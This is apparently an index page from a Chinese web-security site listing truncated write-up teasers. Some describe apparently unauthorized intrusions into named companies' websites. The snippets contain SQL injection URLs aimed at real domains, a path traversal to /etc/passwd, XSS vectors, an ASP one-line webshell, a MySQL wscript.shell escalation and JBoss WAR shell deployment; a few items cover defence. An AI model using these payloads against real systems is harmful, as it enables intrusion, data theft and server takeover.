顺丰综合管理平台服务器沦陷 - 网站安全 - 自学关注热度:20

1.站点是综合管理平台http://219.134.187.150/loginmgmt/index.action2.是jboss的洞，可以远程加载war包，从而获取shell；3.jboss后台确实是设置了密码，但是可以绕过：1.菜刀连上，执行命令如图所示：..[详情]

Wordpress HD Webplayer 1.1 SQL注射及修复 - 网站安全关注热度:31

标题 Wordpress HD Webplayer 1.1 SQL Injection作者: JoinSe7en程序官网: http://www.hdwebplayer.com/软件连接: http://hdwebplayer.com/downloads/hdwebplayer_wordpress_1.1.zip影响版本: version.....[详情]

创新工厂安全宝安全防护绕过漏洞 - 网站安全关注热度:25

在某些web环境下，安全宝对防范sql的部分防护规则可被绕过,继续注入...http://www.51qljr.com/xinxi/shownews.asp?id=(-575) or 1=1简单加个括号http://www.51qljr.com/xinxi/shownews.asp?id=%28-575%29%20%2.....[详情]

不用逗号进行UNION - 网站安全 - 自学php关注热度:25

./download.php01 ...02 if($link){ //加密后ID03 $link = base64_decode(urldecode($link));04 $link_array = explode(#39;,#39;, $link);05 if(is_array($link_array) count($link_array)0.....[详情]

vBulletin Yet Another Awards System 4.0.2 SQL注射 - 网站安关注热度:26

标题: vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day作者: Backsl@sh/Dan软件下载: http://www.vbulletin.org/forum/showthread.php?t=232684影响版本: 4.0.2+问题出.....[详情]

Admidio 2.3.5多个缺陷及修复 - 网站安全 - 自学php关注热度:33

标题 Admidio 2.3.5 Multiple security vulnerabilities作者 Stefan Schurtz影响软件: Successfully tested on Admidio 2.3.5开发者官网: http://www.admidio.org/状态：已修复缺陷概述Admidio 2......[详情]

利用后台SQL查询语句拿webshell - 网站安全 - 自学关注热度:23

今天，朋友给了一个比较好玩的后台有SQL查询功能在后台的主页，或者备份什么的，可以得到网站的物理路径，这里我没有传马，直接点击了备份数据库，重点是得到物理路径，后台主..[详情]

申通快递官网突破所谓的防注继续注 - 网站安全关注热度:20

.现在申通好像做了点防范措施..但..有用吗?一看就知道注入了..申通以为这样就万事大吉了..哈POST提交...为了方便就用穿山甲吧无奈...漏洞证明：后台密码神马都有了..有可能进一步渗透..[详情]

禁止提权常用的细节 - 网站安全 - 自学php关注热度:19

禁止sethc.exe 运行gpedit.msc用户配置管理模板系统双击不要运行指定的windows应用程序把sethc.exe添加进去就行了！卸载wscript.shell对象regsvr32 WSHom.Ocx /u卸载Shell.Applicationregsvr32 /u sh.....[详情]

Xss funny vector review - 网站安全 - 自学php关注热度:21

isindex formaction=javascript:alert(/sogili/) type=submit HTML3与HTML5混搭xoval style=behavior:url(#default#vml);height=00;width=00 href=javascript:alert(/sogili/) fillcolor=red xmlns=/.....[详情]

爱拍发信信息时突破长度限制 - 网站安全 - 自学关注热度:20

拍在发送短消息的时候，只过滤了script，没有过滤其他标签和，所以就产生了XSS。话说上次XSSER让我去钓ID1001，我了个后悔啊，那天我再去复现这个漏洞，拼命给我报错，幸好，今天我再..[详情]

There are URL Redirection Bugs & Possible SQL注射BUG in关注热度:18

Possible SQL注射BUG is found here:http://www.jiapin.com/listgoods/index/cat_id/+union+select+1,2,+--http://www.jiapin.com/listgoods/index/cat_id/+sleep(1)%23Accessing that url and you wil.....[详情]

国产第一品牌数据库人大金仓(kingbase)官方网站入关注热度:56

哎，做数据库的厂家，却在数据库的问题上出现严重问题，一个SQL注入，有时候真的就能致命！入侵路线比较常规：1）发现sql注入，爆出管理员用户名、密码2）在网站中寻找图片并查看..[详情]

Discuz X2.5最新版爆路径 - 网站安全 - 自学php关注热度:36

漏洞证明：http://www.erdare.com/source/plugin/myrepeats/table/table_myrepeats.php修复方案：加!defined(IN_UC) exit(Access Denied);就好了..[详情]

友情检测格力官网 - 网站安全 - 自学php关注热度:17

格力官方网站http://www.gree.com今天在群里无意中看到有人说格力的官方网站是否能日。。闲着没事就去看了下格力的网站后来的结果自然是理想的#9786;直接上神器扫后台敏感目录先 直接爆..[详情]

TAYGOD免费企业建站系统无验证添加管理员实战及关注热度:24

①无验证添加管理员②留言本XSS漏洞详细说明：①无验证添加管理员漏洞文件：Admin_Add.asp漏洞代码：!--#include file=../../config/conn.asp--!--#include file=md5.asp--%if request.QueryString(.....[详情]

对金山游戏的一次渗透测试 - 网站安全 - 自学关注热度:28

本来只想看下金山的某个后台有没有注入啥的可以绕过，谁知道...接下来就是各种游戏服务器提权等。服务器连接内网，但是没有继续渗透。涉及的游戏有月影传说，剑侠二等。话说金..[详情]

不支持PHP情况下，3306端口的提权 - 网站安全 - 自关注热度:25

有root密码了，Navicat连接上去执行sql语句create table a (cmd text);insert into a values (set wshshell=createobject (wscript.shell ) );insert into a values (a=wshshell.run (cmd.e.....[详情]

问题ewebeditor编辑器突破安全狗 - 网站安全 - 自学关注热度:42

题目说到了问题和突破，问题的ewebeditor程序，这儿程序问题出来哪儿呢？1.登陆的地方被删除了，也就是admin_login.asp这个页面被删除了。 2.是post提交好像有问题，不管点击那个提交pos..[详情]

世纪东方建站超市上传漏洞+源码泄漏 - 网站安全关注热度:21

目标:http://jzcs.51web.com/先注册个用户..进入互助问答http://jzcs.51web.com/maq/class/下面有上传啊 哈.直接本地构造个表单 可以使上传文件任意名(后缀必须是jpg什么的).,利用IIS6解析就行了..这是..[详情]

ECMall后台拿webshell - 网站安全 - 自学php关注热度:25

基友叫我看一个ECMall 的站点 求后台拿webshell我发下思路首先我也是第一次搞ECMall 后台拿shell所以慢慢看发现了有一处挂件管理可编辑文件然后选择最后一个编辑注册加盟和注册按钮挂机..[详情]

AJAX也有安全隐患 谈谈AJAX的安全性 - 网站安全关注热度:26

Web开发者不会注意到由 AJAX(Asynchronous JavaScript And XML)所带来的激情。不费力气就能创建像Google Suggest那样的智能网站或者像Gmail那样基于Web的应用程序，这在很大程度上要归功于这种技术..[详情]

xss漏洞和csrf漏洞防御 - 网站安全 - 自学php关注热度:20

xss防御：1、尽量少将域名的domain设为域名的根下面，减少分站xss漏洞对主站的影响；2、对输入的数据进行过滤检查：public static String htmlSpecialChars(final String s) { String result = s; re.....[详情]

Thinksns微博系统注入漏洞一枚 - 网站安全 - 自学关注热度:25

Exp:http://t.thinksns.com/index.php?app=blogmod=Indexact=showid=2211..[详情]

SpeedCMS智能企业网站管理系统任意文件读取 - 网站关注热度:17

http://xxx.com/Article/file/cid/534/?file=../../../../../../../etc/passwd..[详情]

马克思cms后台拿shell方法 - 网站安全 - 自学php关注热度:24

这个方法容易引起出错，如果用这个方法建议用最快的速度给恢复。我本地显示样式问题。%%execute(request(chr(35)))%%#39;输入代码。配置文件插入一句话一句话连接地址：http://www.2cto.com /i..[详情]

盛大云主机致命缺陷致同一物理机用户信息泄露关注热度:14

盛大云主机存在一个致命架构缺陷, 导致用户敏感信息泄露。 同一台物理真实主机的所有子虚拟主机都是共用一个网卡. 这导致了,只要云主机的子虚拟主机打开网卡混杂模式时,就能通过..[详情]

《读者》订阅金额漏洞测试 - 网站安全 - 自学p关注热度:11

http://www.duzhe.com/order/order.action 生成订单后开始付款，chrome开起来。直接跳到支付宝了，后面不敢测试了，就到这里了，不知道能不能返回支付成功的状态。不能的话不要喷我。。作者：..[详情]

XSS漏洞渗透新浪微博《头条新闻》账号 - 网站安关注热度:31

惊闻新浪要高薪聘请会XSS的安全工程师，于是用XSS漏洞测试了下新浪微博《头条新闻》账号，来了场XSS屌丝的逆袭。用XSS得到COOKIE直接就能控制微博，头条新闻这个微博还是比较重要的..[详情]

百度某分站命令执行及修复 - 网站安全 - 自学p关注热度:17

百度某分站存在过滤不严格，导致命令执行mtc.baidu.com是百度对外开发用于测试各类手机操作系统的一个平台但是由于对用户执行的命令过滤不严格，导致可以跨过系统限制，直接在虚拟..[详情]